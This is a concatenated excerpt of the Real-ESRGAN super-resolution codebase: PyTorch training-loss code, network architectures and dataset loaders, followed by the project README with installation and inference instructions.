mode = random.choice(['area', 'bilinear', 'bicubic']) out = F.interpolate(out, size=(ori_h // self.opt['scale'], ori_w // self.opt['scale']), mode=mode) out = filter2D(out, self.sinc_kernel) # clamp and round self.lq = torch.clamp((out * 255.0).round(), 0, 255) / 255. # random crop gt_size = self.opt['gt_size'] (self.gt, self.gt_usm), self.lq = paired_random_crop([self.gt, self.gt_usm], self.lq, gt_size, self.opt['scale']) # training pair pool self._dequeue_and_enqueue() # sharpen self.gt again, as we have changed the self.gt with self._dequeue_and_enqueue self.gt_usm = self.usm_sharpener(self.gt) self.lq = self.lq.contiguous() # for the warning: grad and param do not obey the gradient layout contract else: # for paired training or validation self.lq = data['lq'].to(self.device) if 'gt' in data: self.gt = data['gt'].to(self.device) self.gt_usm = self.usm_sharpener(self.gt) def nondist_validation(self, dataloader, current_iter, tb_logger, save_img): # do not use the synthetic process during validation self.is_train = False super(RealESRGANModel, self).nondist_validation(dataloader, current_iter, tb_logger, save_img) self.is_train = True def optimize_parameters(self, current_iter): # usm sharpening l1_gt = self.gt_usm percep_gt = self.gt_usm gan_gt = self.gt_usm if self.opt['l1_gt_usm'] is False: l1_gt = self.gt if self.opt['percep_gt_usm'] is False: percep_gt = self.gt if self.opt['gan_gt_usm'] is False: gan_gt = self.gt # optimize net_g for p in self.net_d.parameters(): p.requires_grad = False self.optimizer_g.zero_grad() self.output = self.net_g(self.lq) l_g_total = 0 loss_dict = OrderedDict() if (current_iter % self.net_d_iters == 0 and current_iter > self.net_d_init_iters): # pixel loss if self.cri_pix: l_g_pix = self.cri_pix(self.output, l1_gt) l_g_total += l_g_pix loss_dict['l_g_pix'] = l_g_pix # perceptual loss if self.cri_perceptual: l_g_percep, l_g_style = self.cri_perceptual(self.output, percep_gt) if l_g_percep is not None: l_g_total += l_g_percep loss_dict['l_g_percep'] = l_g_percep if l_g_style is not None: l_g_total += l_g_style loss_dict['l_g_style'] = l_g_style # gan loss fake_g_pred = self.net_d(self.output) l_g_gan = self.cri_gan(fake_g_pred, True, is_disc=False) l_g_total += l_g_gan loss_dict['l_g_gan'] = l_g_gan 
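                # At this point l_g_total aggregates the pixel, perceptual (and style,
                # if enabled) and GAN losses; backpropagate and update net_g below.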
l_g_total.backward() self.optimizer_g.step() # optimize net_d for p in self.net_d.parameters(): p.requires_grad = True self.optimizer_d.zero_grad() # real real_d_pred = self.net_d(gan_gt) l_d_real = self.cri_gan(real_d_pred, True, is_disc=True) loss_dict['l_d_real'] = l_d_real loss_dict['out_d_real'] = torch.mean(real_d_pred.detach()) l_d_real.backward() # fake fake_d_pred = self.net_d(self.output.detach().clone()) # clone for pt1.9 l_d_fake = self.cri_gan(fake_d_pred, False, is_disc=True) loss_dict['l_d_fake'] = l_d_fake loss_dict['out_d_fake'] = torch.mean(fake_d_pred.detach()) l_d_fake.backward() self.optimizer_d.step() if self.ema_decay > 0: self.model_ema(decay=self.ema_decay) self.log_dict = self.reduce_loss_dict(loss_dict) File: realesrgan/archs/discriminator_arch.py from basicsr.utils.registry import ARCH_REGISTRY from torch import nn as nn from torch.nn import functional as F from torch.nn.utils import spectral_norm @ARCH_REGISTRY.register() class UNetDiscriminatorSN(nn.Module): """Defines a U-Net discriminator with spectral normalization (SN) It is used in Real-ESRGAN: Training Real-World Blind Super-Resolution with Pure Synthetic Data. Arg: num_in_ch (int): Channel number of inputs. Default: 3. num_feat (int): Channel number of base intermediate features. Default: 64. skip_connection (bool): Whether to use skip connections between U-Net. Default: True. """ def __init__(self, num_in_ch, num_feat=64, skip_connection=True): super(UNetDiscriminatorSN, self).__init__() self.skip_connection = skip_connection norm = spectral_norm # the first convolution self.conv0 = nn.Conv2d(num_in_ch, num_feat, kernel_size=3, stride=1, padding=1) # downsample self.conv1 = norm(nn.Conv2d(num_feat, num_feat * 2, 4, 2, 1, bias=False)) self.conv2 = norm(nn.Conv2d(num_feat * 2, num_feat * 4, 4, 2, 1, bias=False)) self.conv3 = norm(nn.Conv2d(num_feat * 4, num_feat * 8, 4, 2, 1, bias=False)) # upsample self.conv4 = norm(nn.Conv2d(num_feat * 8, num_feat * 4, 3, 1, 1, bias=False)) self.conv5 = norm(nn.Conv2d(num_feat * 4, num_feat * 2, 3, 1, 1, bias=False)) self.conv6 = norm(nn.Conv2d(num_feat * 2, num_feat, 3, 1, 1, bias=False)) # extra convolutions self.conv7 = norm(nn.Conv2d(num_feat, num_feat, 3, 1, 1, bias=False)) self.conv8 = norm(nn.Conv2d(num_feat, num_feat, 3, 1, 1, bias=False)) self.conv9 = nn.Conv2d(num_feat, 1, 3, 1, 1) def forward(self, x): # downsample x0 = F.leaky_relu(self.conv0(x), negative_slope=0.2, inplace=True) x1 = F.leaky_relu(self.conv1(x0), negative_slope=0.2, inplace=True) x2 = F.leaky_relu(self.conv2(x1), negative_slope=0.2, inplace=True) x3 = F.leaky_relu(self.conv3(x2), negative_slope=0.2, inplace=True) # upsample x3 = F.interpolate(x3, scale_factor=2, mode='bilinear', align_corners=False) x4 = F.leaky_relu(self.conv4(x3), negative_slope=0.2, inplace=True) if self.skip_connection: x4 = x4 + x2 x4 = F.interpolate(x4, scale_factor=2, mode='bilinear', align_corners=False) x5 = F.leaky_relu(self.conv5(x4), negative_slope=0.2, inplace=True) if self.skip_connection: x5 = x5 + x1 x5 = F.interpolate(x5, scale_factor=2, mode='bilinear', align_corners=False) x6 = F.leaky_relu(self.conv6(x5), negative_slope=0.2, inplace=True) if self.skip_connection: x6 = x6 + x0 # extra convolutions out = F.leaky_relu(self.conv7(x6), negative_slope=0.2, inplace=True) out = F.leaky_relu(self.conv8(out), negative_slope=0.2, inplace=True) out = self.conv9(out) return out File: realesrgan/archs/__init__.py import importlib from basicsr.utils import scandir from os import path as osp # automatically scan and 
import arch modules for registry # scan all the files that end with '_arch.py' under the archs folder arch_folder = osp.dirname(osp.abspath(__file__)) arch_filenames = [osp.splitext(osp.basename(v))[0] for v in scandir(arch_folder) if v.endswith('_arch.py')] # import all the arch modules _arch_modules = [importlib.import_module(f'realesrgan.archs.{file_name}') for file_name in arch_filenames] File: realesrgan/archs/srvgg_arch.py from basicsr.utils.registry import ARCH_REGISTRY from torch import nn as nn from torch.nn import functional as F @ARCH_REGISTRY.register() class SRVGGNetCompact(nn.Module): """A compact VGG-style network structure for super-resolution. It is a compact network structure, which performs upsampling in the last layer and no convolution is conducted on the HR feature space. Args: num_in_ch (int): Channel number of inputs. Default: 3. num_out_ch (int): Channel number of outputs. Default: 3. num_feat (int): Channel number of intermediate features. Default: 64. num_conv (int): Number of convolution layers in the body network. Default: 16. upscale (int): Upsampling factor. Default: 4. act_type (str): Activation type, options: 'relu', 'prelu', 'leakyrelu'. Default: prelu. """ def __init__(self, num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=4, act_type='prelu'): super(SRVGGNetCompact, self).__init__() self.num_in_ch = num_in_ch self.num_out_ch = num_out_ch self.num_feat = num_feat self.num_conv = num_conv self.upscale = upscale self.act_type = act_type self.body = nn.ModuleList() # the first conv self.body.append(nn.Conv2d(num_in_ch, num_feat, 3, 1, 1)) # the first activation if act_type == 'relu': activation = nn.ReLU(inplace=True) elif act_type == 'prelu': activation = nn.PReLU(num_parameters=num_feat) elif act_type == 'leakyrelu': activation = nn.LeakyReLU(negative_slope=0.1, inplace=True) self.body.append(activation) # the body structure for _ in range(num_conv): self.body.append(nn.Conv2d(num_feat, num_feat, 3, 1, 1)) # activation if act_type == 'relu': activation = nn.ReLU(inplace=True) elif act_type == 'prelu': activation = nn.PReLU(num_parameters=num_feat) elif act_type == 'leakyrelu': activation = nn.LeakyReLU(negative_slope=0.1, inplace=True) self.body.append(activation) # the last conv self.body.append(nn.Conv2d(num_feat, num_out_ch * upscale * upscale, 3, 1, 1)) # upsample self.upsampler = nn.PixelShuffle(upscale) def forward(self, x): out = x for i in range(0, len(self.body)): out = self.body[i](out) out = self.upsampler(out) # add the nearest upsampled image, so that the network learns the residual base = F.interpolate(x, scale_factor=self.upscale, mode='nearest') out += base return out File: realesrgan/data/__init__.py import importlib from basicsr.utils import scandir from os import path as osp # automatically scan and import dataset modules for registry # scan all the files that end with '_dataset.py' under the data folder data_folder = osp.dirname(osp.abspath(__file__)) dataset_filenames = [osp.splitext(osp.basename(v))[0] for v in scandir(data_folder) if v.endswith('_dataset.py')] # import all the dataset modules _dataset_modules = [importlib.import_module(f'realesrgan.data.{file_name}') for file_name in dataset_filenames] File: realesrgan/data/realesrgan_dataset.py import cv2 import math import numpy as np import os import os.path as osp import random import time import torch from basicsr.data.degradations import circular_lowpass_kernel, random_mixed_kernels from basicsr.data.transforms import augment from basicsr.utils import FileClient, 
get_root_logger, imfrombytes, img2tensor from basicsr.utils.registry import DATASET_REGISTRY from torch.utils import data as data @DATASET_REGISTRY.register() class RealESRGANDataset(data.Dataset): """Dataset used for Real-ESRGAN model: Real-ESRGAN: Training Real-World Blind Super-Resolution with Pure Synthetic Data. It loads gt (Ground-Truth) images, and augments them. It also generates blur kernels and sinc kernels for generating low-quality images. Note that the low-quality images are processed in tensors on GPUS for faster processing. Args: opt (dict): Config for train datasets. It contains the following keys: dataroot_gt (str): Data root path for gt. meta_info (str): Path for meta information file. io_backend (dict): IO backend type and other kwarg. use_hflip (bool): Use horizontal flips. use_rot (bool): Use rotation (use vertical flip and transposing h and w for implementation). Please see more options in the codes. """ def __init__(self, opt): super(RealESRGANDataset, self).__init__() self.opt = opt self.file_client = None self.io_backend_opt = opt['io_backend'] self.gt_folder = opt['dataroot_gt'] # file client (lmdb io backend) if self.io_backend_opt['type'] == 'lmdb': self.io_backend_opt['db_paths'] = [self.gt_folder] self.io_backend_opt['client_keys'] = ['gt'] if not self.gt_folder.endswith('.lmdb'): raise ValueError(f"'dataroot_gt' should end with '.lmdb', but received {self.gt_folder}") with open(osp.join(self.gt_folder, 'meta_info.txt')) as fin: self.paths = [line.split('.')[0] for line in fin] else: # disk backend with meta_info # Each line in the meta_info describes the relative path to an image with open(self.opt['meta_info']) as fin: paths = [line.strip().split(' ')[0] for line in fin] self.paths = [os.path.join(self.gt_folder, v) for v in paths] # blur settings for the first degradation self.blur_kernel_size = opt['blur_kernel_size'] self.kernel_list = opt['kernel_list'] self.kernel_prob = opt['kernel_prob'] # a list for each kernel probability self.blur_sigma = opt['blur_sigma'] self.betag_range = opt['betag_range'] # betag used in generalized Gaussian blur kernels self.betap_range = opt['betap_range'] # betap used in plateau blur kernels self.sinc_prob = opt['sinc_prob'] # the probability for sinc filters # blur settings for the second degradation self.blur_kernel_size2 = opt['blur_kernel_size2'] self.kernel_list2 = opt['kernel_list2'] self.kernel_prob2 = opt['kernel_prob2'] self.blur_sigma2 = opt['blur_sigma2'] self.betag_range2 = opt['betag_range2'] self.betap_range2 = opt['betap_range2'] self.sinc_prob2 = opt['sinc_prob2'] # a final sinc filter self.final_sinc_prob = opt['final_sinc_prob'] self.kernel_range = [2 * v + 1 for v in range(3, 11)] # kernel size ranges from 7 to 21 # TODO: kernel range is now hard-coded, should be in the configure file self.pulse_tensor = torch.zeros(21, 21).float() # convolving with pulse tensor brings no blurry effect self.pulse_tensor[10, 10] = 1 def __getitem__(self, index): if self.file_client is None: self.file_client = FileClient(self.io_backend_opt.pop('type'), **self.io_backend_opt) # -------------------------------- Load gt images -------------------------------- # # Shape: (h, w, c); channel order: BGR; image range: [0, 1], float32. 
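        # Descriptive note on the rest of __getitem__: (1) read the GT image,
        # retrying with a different random index if the file client fails;
        # (2) flip/rotate it and crop or reflection-pad it to 400x400;
        # (3) sample two blur kernels (either a sinc filter or
        # random_mixed_kernels) for the two-stage degradation and zero-pad
        # each to 21x21; (4) optionally sample a final sinc kernel (otherwise
        # the pulse tensor, i.e. no blur) before returning the GT tensor
        # together with the three kernels.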
gt_path = self.paths[index] # avoid errors caused by high latency in reading files retry = 3 while retry > 0: try: img_bytes = self.file_client.get(gt_path, 'gt') except (IOError, OSError) as e: logger = get_root_logger() logger.warn(f'File client error: {e}, remaining retry times: {retry - 1}') # change another file to read index = random.randint(0, self.__len__()) gt_path = self.paths[index] time.sleep(1) # sleep 1s for occasional server congestion else: break finally: retry -= 1 img_gt = imfrombytes(img_bytes, float32=True) # -------------------- Do augmentation for training: flip, rotation -------------------- # img_gt = augment(img_gt, self.opt['use_hflip'], self.opt['use_rot']) # crop or pad to 400 # TODO: 400 is hard-coded. You may change it accordingly h, w = img_gt.shape[0:2] crop_pad_size = 400 # pad if h < crop_pad_size or w < crop_pad_size: pad_h = max(0, crop_pad_size - h) pad_w = max(0, crop_pad_size - w) img_gt = cv2.copyMakeBorder(img_gt, 0, pad_h, 0, pad_w, cv2.BORDER_REFLECT_101) # crop if img_gt.shape[0] > crop_pad_size or img_gt.shape[1] > crop_pad_size: h, w = img_gt.shape[0:2] # randomly choose top and left coordinates top = random.randint(0, h - crop_pad_size) left = random.randint(0, w - crop_pad_size) img_gt = img_gt[top:top + crop_pad_size, left:left + crop_pad_size, ...] # ------------------------ Generate kernels (used in the first degradation) ------------------------ # kernel_size = random.choice(self.kernel_range) if np.random.uniform() < self.opt['sinc_prob']: # this sinc filter setting is for kernels ranging from [7, 21] if kernel_size < 13: omega_c = np.random.uniform(np.pi / 3, np.pi) else: omega_c = np.random.uniform(np.pi / 5, np.pi) kernel = circular_lowpass_kernel(omega_c, kernel_size, pad_to=False) else: kernel = random_mixed_kernels( self.kernel_list, self.kernel_prob, kernel_size, self.blur_sigma, self.blur_sigma, [-math.pi, math.pi], self.betag_range, self.betap_range, noise_range=None) # pad kernel pad_size = (21 - kernel_size) // 2 kernel = np.pad(kernel, ((pad_size, pad_size), (pad_size, pad_size))) # ------------------------ Generate kernels (used in the second degradation) ------------------------ # kernel_size = random.choice(self.kernel_range) if np.random.uniform() < self.opt['sinc_prob2']: if kernel_size < 13: omega_c = np.random.uniform(np.pi / 3, np.pi) else: omega_c = np.random.uniform(np.pi / 5, np.pi) kernel2 = circular_lowpass_kernel(omega_c, kernel_size, pad_to=False) else: kernel2 = random_mixed_kernels( self.kernel_list2, self.kernel_prob2, kernel_size, self.blur_sigma2, self.blur_sigma2, [-math.pi, math.pi], self.betag_range2, self.betap_range2, noise_range=None) # pad kernel pad_size = (21 - kernel_size) // 2 kernel2 = np.pad(kernel2, ((pad_size, pad_size), (pad_size, pad_size))) # ------------------------------------- the final sinc kernel ------------------------------------- # if np.random.uniform() < self.opt['final_sinc_prob']: kernel_size = random.choice(self.kernel_range) omega_c = np.random.uniform(np.pi / 3, np.pi) sinc_kernel = circular_lowpass_kernel(omega_c, kernel_size, pad_to=21) sinc_kernel = torch.FloatTensor(sinc_kernel) else: sinc_kernel = self.pulse_tensor # BGR to RGB, HWC to CHW, numpy to tensor img_gt = img2tensor([img_gt], bgr2rgb=True, float32=True)[0] kernel = torch.FloatTensor(kernel) kernel2 = torch.FloatTensor(kernel2) return_d = {'gt': img_gt, 'kernel1': kernel, 'kernel2': kernel2, 'sinc_kernel': sinc_kernel, 'gt_path': gt_path} return return_d def __len__(self): return len(self.paths) File: 
realesrgan/data/realesrgan_paired_dataset.py import os from basicsr.data.data_util import paired_paths_from_folder, paired_paths_from_lmdb from basicsr.data.transforms import augment, paired_random_crop from basicsr.utils import FileClient, imfrombytes, img2tensor from basicsr.utils.registry import DATASET_REGISTRY from torch.utils import data as data from torchvision.transforms.functional import normalize @DATASET_REGISTRY.register() class RealESRGANPairedDataset(data.Dataset): """Paired image dataset for image restoration. Read LQ (Low Quality, e.g. LR (Low Resolution), blurry, noisy, etc) and GT image pairs. There are three modes: 1. 'lmdb': Use lmdb files. If opt['io_backend'] == lmdb. 2. 'meta_info': Use meta information file to generate paths. If opt['io_backend'] != lmdb and opt['meta_info'] is not None. 3. 'folder': Scan folders to generate paths. The rest. Args: opt (dict): Config for train datasets. It contains the following keys: dataroot_gt (str): Data root path for gt. dataroot_lq (str): Data root path for lq. meta_info (str): Path for meta information file. io_backend (dict): IO backend type and other kwarg. filename_tmpl (str): Template for each filename. Note that the template excludes the file extension. Default: '{}'. gt_size (int): Cropped patched size for gt patches. use_hflip (bool): Use horizontal flips. use_rot (bool): Use rotation (use vertical flip and transposing h and w for implementation). scale (bool): Scale, which will be added automatically. phase (str): 'train' or 'val'. """ def __init__(self, opt): super(RealESRGANPairedDataset, self).__init__() self.opt = opt self.file_client = None self.io_backend_opt = opt['io_backend'] # mean and std for normalizing the input images self.mean = opt['mean'] if 'mean' in opt else None self.std = opt['std'] if 'std' in opt else None self.gt_folder, self.lq_folder = opt['dataroot_gt'], opt['dataroot_lq'] self.filename_tmpl = opt['filename_tmpl'] if 'filename_tmpl' in opt else '{}' # file client (lmdb io backend) if self.io_backend_opt['type'] == 'lmdb': self.io_backend_opt['db_paths'] = [self.lq_folder, self.gt_folder] self.io_backend_opt['client_keys'] = ['lq', 'gt'] self.paths = paired_paths_from_lmdb([self.lq_folder, self.gt_folder], ['lq', 'gt']) elif 'meta_info' in self.opt and self.opt['meta_info'] is not None: # disk backend with meta_info # Each line in the meta_info describes the relative path to an image with open(self.opt['meta_info']) as fin: paths = [line.strip() for line in fin] self.paths = [] for path in paths: gt_path, lq_path = path.split(', ') gt_path = os.path.join(self.gt_folder, gt_path) lq_path = os.path.join(self.lq_folder, lq_path) self.paths.append(dict([('gt_path', gt_path), ('lq_path', lq_path)])) else: # disk backend # it will scan the whole folder to get meta info # it will be time-consuming for folders with too many files. It is recommended using an extra meta txt file self.paths = paired_paths_from_folder([self.lq_folder, self.gt_folder], ['lq', 'gt'], self.filename_tmpl) def __getitem__(self, index): if self.file_client is None: self.file_client = FileClient(self.io_backend_opt.pop('type'), **self.io_backend_opt) scale = self.opt['scale'] # Load gt and lq images. Dimension order: HWC; channel order: BGR; # image range: [0, 1], float32. 
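        # During training, a paired random crop is taken below: the GT crop is
        # gt_size x gt_size and the matching LQ crop is (gt_size // scale) per
        # side, followed by flip/rotation, BGR->RGB and HWC->CHW tensor
        # conversion, and optional mean/std normalization.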
gt_path = self.paths[index]['gt_path'] img_bytes = self.file_client.get(gt_path, 'gt') img_gt = imfrombytes(img_bytes, float32=True) lq_path = self.paths[index]['lq_path'] img_bytes = self.file_client.get(lq_path, 'lq') img_lq = imfrombytes(img_bytes, float32=True) # augmentation for training if self.opt['phase'] == 'train': gt_size = self.opt['gt_size'] # random crop img_gt, img_lq = paired_random_crop(img_gt, img_lq, gt_size, scale, gt_path) # flip, rotation img_gt, img_lq = augment([img_gt, img_lq], self.opt['use_hflip'], self.opt['use_rot']) # BGR to RGB, HWC to CHW, numpy to tensor img_gt, img_lq = img2tensor([img_gt, img_lq], bgr2rgb=True, float32=True) # normalize if self.mean is not None or self.std is not None: normalize(img_lq, self.mean, self.std, inplace=True) normalize(img_gt, self.mean, self.std, inplace=True) return {'lq': img_lq, 'gt': img_gt, 'lq_path': lq_path, 'gt_path': gt_path} def __len__(self): return len(self.paths)
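The snippet below is an illustrative sanity check, not part of the repository: it instantiates the two registered architectures from `realesrgan/archs` shown above and verifies their output shapes. It assumes `torch` and `basicsr` are installed and that the package has been set up (e.g. via `python setup.py develop`, as in the installation section of the README that follows); the input sizes are arbitrary.

```python
import torch

from realesrgan.archs.discriminator_arch import UNetDiscriminatorSN
from realesrgan.archs.srvgg_arch import SRVGGNetCompact

# Compact SR generator: a plain conv stack, PixelShuffle(4) upsampling, plus a
# nearest-neighbour upsampled residual of the input.
sr_net = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16,
                         upscale=4, act_type='prelu')
lr = torch.rand(1, 3, 64, 64)
with torch.no_grad():
    sr = sr_net(lr)
print(sr.shape)  # torch.Size([1, 3, 256, 256])

# U-Net discriminator with spectral norm: one realness score per output pixel.
# Spatial dims should be divisible by 8 so the skip connections line up.
disc = UNetDiscriminatorSN(num_in_ch=3, num_feat=64, skip_connection=True)
with torch.no_grad():
    pred = disc(sr)
print(pred.shape)  # torch.Size([1, 1, 256, 256])
```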
<p align="center"> <img src="assets/realesrgan_logo.png" height=120> </p> ## <div align="center"><b><a href="README.md">English</a> | <a href="README_CN.md">简体中文</a></b></div> <div align="center"> 👀[**Demos**](#-demos-videos) **|** 🚩[**Updates**](#-updates) **|** ⚡[**Usage**](#-quick-inference) **|** 🏰[**Model Zoo**](docs/model_zoo.md) **|** 🔧[Install](#-dependencies-and-installation) **|** 💻[Train](docs/Training.md) **|** ❓[FAQ](docs/FAQ.md) **|** 🎨[Contribution](docs/CONTRIBUTING.md) [![download](https://img.shields.io/github/downloads/xinntao/Real-ESRGAN/total.svg)](https://github.com/xinntao/Real-ESRGAN/releases) [![PyPI](https://img.shields.io/pypi/v/realesrgan)](https://pypi.org/project/realesrgan/) [![Open issue](https://img.shields.io/github/issues/xinntao/Real-ESRGAN)](https://github.com/xinntao/Real-ESRGAN/issues) [![Closed issue](https://img.shields.io/github/issues-closed/xinntao/Real-ESRGAN)](https://github.com/xinntao/Real-ESRGAN/issues) [![LICENSE](https://img.shields.io/github/license/xinntao/Real-ESRGAN.svg)](https://github.com/xinntao/Real-ESRGAN/blob/master/LICENSE) [![python lint](https://github.com/xinntao/Real-ESRGAN/actions/workflows/pylint.yml/badge.svg)](https://github.com/xinntao/Real-ESRGAN/blob/master/.github/workflows/pylint.yml) [![Publish-pip](https://github.com/xinntao/Real-ESRGAN/actions/workflows/publish-pip.yml/badge.svg)](https://github.com/xinntao/Real-ESRGAN/blob/master/.github/workflows/publish-pip.yml) </div> 🔥 **AnimeVideo-v3 model (动漫视频小模型)**. Please see [[*anime video models*](docs/anime_video_model.md)] and [[*comparisons*](docs/anime_comparisons.md)]<br> 🔥 **RealESRGAN_x4plus_anime_6B** for anime images **(动漫插图模型)**. Please see [[*anime_model*](docs/anime_model.md)] <!-- 1. You can try in our website: [ARC Demo](https://arc.tencent.com/en/ai-demos/imgRestore) (now only support RealESRGAN_x4plus_anime_6B) --> 1. :boom: **Update** online Replicate demo: [![Replicate](https://img.shields.io/static/v1?label=Demo&message=Replicate&color=blue)](https://replicate.com/xinntao/realesrgan) 1. Online Colab demo for Real-ESRGAN: [![Colab](https://img.shields.io/static/v1?label=Demo&message=Colab&color=orange)](https://colab.research.google.com/drive/1k2Zod6kSHEvraybHl50Lys0LerhyTMCo?usp=sharing) **|** Online Colab demo for for Real-ESRGAN (**anime videos**): [![Colab](https://img.shields.io/static/v1?label=Demo&message=Colab&color=orange)](https://colab.research.google.com/drive/1yNl9ORUxxlL4N0keJa2SEPB61imPQd1B?usp=sharing) 1. Portable [Windows](https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesrgan-ncnn-vulkan-20220424-windows.zip) / [Linux](https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesrgan-ncnn-vulkan-20220424-ubuntu.zip) / [MacOS](https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesrgan-ncnn-vulkan-20220424-macos.zip) **executable files for Intel/AMD/Nvidia GPU**. You can find more information [here](#portable-executable-files-ncnn). The ncnn implementation is in [Real-ESRGAN-ncnn-vulkan](https://github.com/xinntao/Real-ESRGAN-ncnn-vulkan) <!-- 1. You can watch enhanced animations in [Tencent Video](https://v.qq.com/s/topic/v_child/render/fC4iyCAM.html). 欢迎观看[腾讯视频动漫修复](https://v.qq.com/s/topic/v_child/render/fC4iyCAM.html) --> Real-ESRGAN aims at developing **Practical Algorithms for General Image/Video Restoration**.<br> We extend the powerful ESRGAN to a practical restoration application (namely, Real-ESRGAN), which is trained with pure synthetic data. 
🌌 Thanks for your valuable feedback and suggestions. All the feedback is collected in [feedback.md](docs/feedback.md).

---

If Real-ESRGAN is helpful, please help to ⭐ this repo or recommend it to your friends 😊 <br>
Other recommended projects:<br>
▶️ [GFPGAN](https://github.com/TencentARC/GFPGAN): A practical algorithm for real-world face restoration <br>
▶️ [BasicSR](https://github.com/xinntao/BasicSR): An open-source image and video restoration toolbox<br>
▶️ [facexlib](https://github.com/xinntao/facexlib): A collection of useful face-related functions<br>
▶️ [HandyView](https://github.com/xinntao/HandyView): A PyQt5-based image viewer that is handy for viewing and comparison <br>
▶️ [HandyFigure](https://github.com/xinntao/HandyFigure): Open-source paper figures <br>

---

### 📖 Real-ESRGAN: Training Real-World Blind Super-Resolution with Pure Synthetic Data

> [[Paper](https://arxiv.org/abs/2107.10833)] &emsp; [[YouTube Video](https://www.youtube.com/watch?v=fxHWoDSSvSc)] &emsp; [[B站讲解](https://www.bilibili.com/video/BV1H34y1m7sS/)] &emsp; [[Poster](https://xinntao.github.io/projects/RealESRGAN_src/RealESRGAN_poster.pdf)] &emsp; [[PPT slides](https://docs.google.com/presentation/d/1QtW6Iy8rm8rGLsJ0Ldti6kP-7Qyzy6XL/edit?usp=sharing&ouid=109799856763657548160&rtpof=true&sd=true)]<br>
> [Xintao Wang](https://xinntao.github.io/), Liangbin Xie, [Chao Dong](https://scholar.google.com.hk/citations?user=OSDCB0UAAAAJ), [Ying Shan](https://scholar.google.com/citations?user=4oXBp9UAAAAJ&hl=en) <br>
> [Tencent ARC Lab](https://arc.tencent.com/en/ai-demos/imgRestore); Shenzhen Institutes of Advanced Technology, Chinese Academy of Sciences

<p align="center">
  <img src="assets/teaser.jpg">
</p>

---

<!---------------------------------- Updates --------------------------->
## 🚩 Updates

- ✅ Add the **realesr-general-x4v3** model - a tiny model for general scenes. It also supports the **-dn** option to balance the noise (avoiding over-smoothed results). **-dn** is short for denoising strength.
- ✅ Update the **RealESRGAN AnimeVideo-v3** model. Please see [anime video models](docs/anime_video_model.md) and [comparisons](docs/anime_comparisons.md) for more details.
- ✅ Add small models for anime videos. More details are in [anime video models](docs/anime_video_model.md).
- ✅ Add the ncnn implementation [Real-ESRGAN-ncnn-vulkan](https://github.com/xinntao/Real-ESRGAN-ncnn-vulkan).
- ✅ Add [*RealESRGAN_x4plus_anime_6B.pth*](https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.2.4/RealESRGAN_x4plus_anime_6B.pth), which is optimized for **anime** images with a much smaller model size. More details and comparisons with [waifu2x](https://github.com/nihui/waifu2x-ncnn-vulkan) are in [**anime_model.md**](docs/anime_model.md)
- ✅ Support finetuning on your own data or paired data (*i.e.*, finetuning ESRGAN). See [here](docs/Training.md#Finetune-Real-ESRGAN-on-your-own-dataset)
- ✅ Integrate [GFPGAN](https://github.com/TencentARC/GFPGAN) to support **face enhancement**.
- ✅ Integrated into [Huggingface Spaces](https://huggingface.co/spaces) with [Gradio](https://github.com/gradio-app/gradio). See [Gradio Web Demo](https://huggingface.co/spaces/akhaliq/Real-ESRGAN). Thanks [@AK391](https://github.com/AK391)
- ✅ Support arbitrary scale with `--outscale` (it further resizes outputs with `LANCZOS4`). Add the *RealESRGAN_x2plus.pth* model.
- ✅ [The inference code](inference_realesrgan.py) supports: 1) **tile** options; 2) images with **alpha channel**; 3) **gray** images; 4) **16-bit** images.
- ✅ The training code has been released. A detailed guide can be found in [Training.md](docs/Training.md).

---

<!---------------------------------- Demo videos --------------------------->
## 👀 Demos Videos

#### Bilibili

- [大闹天宫片段](https://www.bilibili.com/video/BV1ja41117zb)
- [Anime dance cut 动漫魔性舞蹈](https://www.bilibili.com/video/BV1wY4y1L7hT/)
- [海贼王片段](https://www.bilibili.com/video/BV1i3411L7Gy/)

#### YouTube

## 🔧 Dependencies and Installation

- Python >= 3.7 (we recommend [Anaconda](https://www.anaconda.com/download/#linux) or [Miniconda](https://docs.conda.io/en/latest/miniconda.html))
- [PyTorch >= 1.7](https://pytorch.org/)

### Installation

1. Clone repo

    ```bash
    git clone https://github.com/xinntao/Real-ESRGAN.git
    cd Real-ESRGAN
    ```

1. Install dependent packages

    ```bash
    # Install basicsr - https://github.com/xinntao/BasicSR
    # We use BasicSR for both training and inference
    pip install basicsr
    # facexlib and gfpgan are for face enhancement
    pip install facexlib
    pip install gfpgan
    pip install -r requirements.txt
    python setup.py develop
    ```

---

## ⚡ Quick Inference

There are usually three ways to run inference with Real-ESRGAN.

1. [Online inference](#online-inference)
1. [Portable executable files (NCNN)](#portable-executable-files-ncnn)
1. [Python script](#python-script)

### Online inference

1. You can try it on our website: [ARC Demo](https://arc.tencent.com/en/ai-demos/imgRestore) (it currently only supports RealESRGAN_x4plus_anime_6B)
1. [Colab Demo](https://colab.research.google.com/drive/1k2Zod6kSHEvraybHl50Lys0LerhyTMCo?usp=sharing) for Real-ESRGAN **|** [Colab Demo](https://colab.research.google.com/drive/1yNl9ORUxxlL4N0keJa2SEPB61imPQd1B?usp=sharing) for Real-ESRGAN (**anime videos**).

### Portable executable files (NCNN)

You can download [Windows](https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesrgan-ncnn-vulkan-20220424-windows.zip) / [Linux](https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesrgan-ncnn-vulkan-20220424-ubuntu.zip) / [MacOS](https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesrgan-ncnn-vulkan-20220424-macos.zip) **executable files for Intel/AMD/Nvidia GPU**.

The executable file is **portable** and includes all the binaries and models required. No CUDA or PyTorch environment is needed.<br>
You can simply run the following command (this is the Windows example; more information is in the README.md of each executable file):

```bash
./realesrgan-ncnn-vulkan.exe -i input.jpg -o output.png -n model_name
```

We have provided the following models:

1. realesrgan-x4plus (default)
2. realesrnet-x4plus
3. realesrgan-x4plus-anime (optimized for anime images, small model size)
4. realesr-animevideov3 (animation videos)

You can use the `-n` argument to select other models, for example, `./realesrgan-ncnn-vulkan.exe -i input.jpg -o output.png -n realesrnet-x4plus`

#### Usage of portable executable files

1. Please refer to [Real-ESRGAN-ncnn-vulkan](https://github.com/xinntao/Real-ESRGAN-ncnn-vulkan#computer-usages) for more details.
